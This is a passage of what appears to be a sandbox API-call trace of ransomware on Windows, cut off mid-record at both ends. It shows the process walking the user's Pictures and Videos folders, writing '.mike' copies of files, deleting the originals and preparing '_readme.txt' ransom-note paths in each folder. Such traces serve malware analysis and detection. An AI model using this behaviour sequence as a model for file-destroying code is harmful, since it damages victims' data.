HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3", lpFilePart=0x0) returned 0x6f [0155.145] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0155.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\kZIzcHT.png.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\kZIzcHT.png.mike", lpFilePart=0x0) returned 0x80 [0155.146] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\kZIzcHT.png", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\kZIzcHT.png", lpFilePart=0x0) returned 0x7b [0155.154] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\kZIzcHT.png.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\kZIzcHT.png.mike", lpFilePart=0x0) returned 0x80 [0155.154] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\kZIzcHT.png.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\kZIzcHT.png.mike", lpFilePart=0x0) returned 0x80 [0155.154] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\kZIzcHT.png", dwFileAttributes=0x80) returned 1 [0155.155] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\kZIzcHT.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\wroof2dw16y\\99q8df\\f0dhyzclaq_t3\\kzizcht.png")) returned 1 [0155.157] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\_readme.txt", lpFilePart=0x0) returned 0x7b [0155.158] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.158] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.158] CoTaskMemFree (pv=0x508980) [0155.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.159] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH", lpFilePart=0x0) returned 0x75 [0155.159] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0155.160] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\2n3cs_q.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\2n3cs_q.png.mike", lpFilePart=0x0) returned 0x86 [0155.161] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\2n3cs_q.png", nBufferLength=0x105, lpBuffer=0x2aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\2n3cs_q.png", lpFilePart=0x0) returned 0x81 [0155.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\2n3cs_q.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\2n3cs_q.png.mike", lpFilePart=0x0) returned 0x86 [0155.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\2n3cs_q.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\2n3cs_q.png.mike", lpFilePart=0x0) returned 0x86 [0155.165] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\2n3cs_q.png", dwFileAttributes=0x80) returned 1 [0155.166] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\2n3cs_q.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\wroof2dw16y\\99q8df\\f0dhyzclaq_t3\\b qph\\2n3cs_q.png")) returned 1 [0155.167] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\b QPH\\_readme.txt", lpFilePart=0x0) returned 0x81 [0155.169] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.169] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.169] CoTaskMemFree (pv=0x508980) [0155.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.170] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY", lpFilePart=0x0) returned 0x7c [0155.170] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0155.170] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\XWhiMKTJhTgWC fxuM.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\XWhiMKTJhTgWC fxuM.jpg.mike", lpFilePart=0x0) returned 0x98 [0155.171] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\XWhiMKTJhTgWC fxuM.jpg", nBufferLength=0x105, lpBuffer=0x2aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\XWhiMKTJhTgWC fxuM.jpg", lpFilePart=0x0) returned 0x93 [0155.185] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\XWhiMKTJhTgWC fxuM.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\XWhiMKTJhTgWC fxuM.jpg.mike", lpFilePart=0x0) returned 0x98 [0155.186] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\XWhiMKTJhTgWC fxuM.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\XWhiMKTJhTgWC fxuM.jpg.mike", lpFilePart=0x0) returned 0x98 [0155.186] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\XWhiMKTJhTgWC fxuM.jpg", dwFileAttributes=0x80) returned 1 [0155.187] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\XWhiMKTJhTgWC fxuM.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\wroof2dw16y\\99q8df\\f0dhyzclaq_t3\\wxznkb_rcnqy\\xwhimktjhtgwc fxum.jpg")) returned 1 [0155.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\wROOf2dw16y\\99q8DF\\f0dhYZcLaq_T3\\WXzNkB_RCNQY\\_readme.txt", lpFilePart=0x0) returned 0x88 [0155.191] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.191] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.191] CoTaskMemFree (pv=0x508980) [0155.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.192] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood", lpFilePart=0x0) returned 0x27 [0155.193] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", lpFilePart=0x0) returned 0x24 [0155.193] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.193] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.194] CoTaskMemFree (pv=0x508980) [0155.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent", lpFilePart=0x0) returned 0x24 [0155.196] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpFilePart=0x0) returned 0x29 [0155.196] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.196] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.196] CoTaskMemFree (pv=0x508980) [0155.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.197] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpFilePart=0x0) returned 0x29 [0155.197] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.197] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.197] CoTaskMemFree (pv=0x508980) [0155.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.198] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpFilePart=0x0) returned 0x26 [0155.198] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.198] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.199] CoTaskMemFree (pv=0x508980) [0155.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.199] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", lpFilePart=0x0) returned 0x24 [0155.200] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", lpFilePart=0x0) returned 0x28 [0155.201] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.201] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.201] CoTaskMemFree (pv=0x508980) [0155.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.201] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", lpFilePart=0x0) returned 0x28 [0155.203] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", lpFilePart=0x0) returned 0x27 [0155.203] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.203] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.203] CoTaskMemFree (pv=0x508980) [0155.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.204] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", lpFilePart=0x0) returned 0x27 [0155.205] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpFilePart=0x0) returned 0x24 [0155.205] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.206] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.206] CoTaskMemFree (pv=0x508980) [0155.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.206] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpFilePart=0x0) returned 0x24 [0155.207] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.207] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf.mike", lpFilePart=0x0) returned 0x3a [0155.208] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf", lpFilePart=0x0) returned 0x35 [0155.230] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf", lpFilePart=0x0) returned 0x35 [0155.233] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf.mike", lpFilePart=0x0) returned 0x3a [0155.233] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf.mike", lpFilePart=0x0) returned 0x3a [0155.233] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf", dwFileAttributes=0x80) returned 1 [0155.235] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5U943_2lOUWC.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5u943_2louwc.swf")) returned 1 [0155.237] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", lpFilePart=0x0) returned 0x30 [0155.238] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.239] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7f7G9705nquBATl.avi.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7f7G9705nquBATl.avi.mike", lpFilePart=0x0) returned 0x3d [0155.239] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7f7G9705nquBATl.avi", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7f7G9705nquBATl.avi", lpFilePart=0x0) returned 0x38 [0155.249] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7f7G9705nquBATl.avi.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7f7G9705nquBATl.avi.mike", lpFilePart=0x0) returned 0x3d [0155.250] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7f7G9705nquBATl.avi.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7f7G9705nquBATl.avi.mike", lpFilePart=0x0) returned 0x3d [0155.250] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7f7G9705nquBATl.avi", 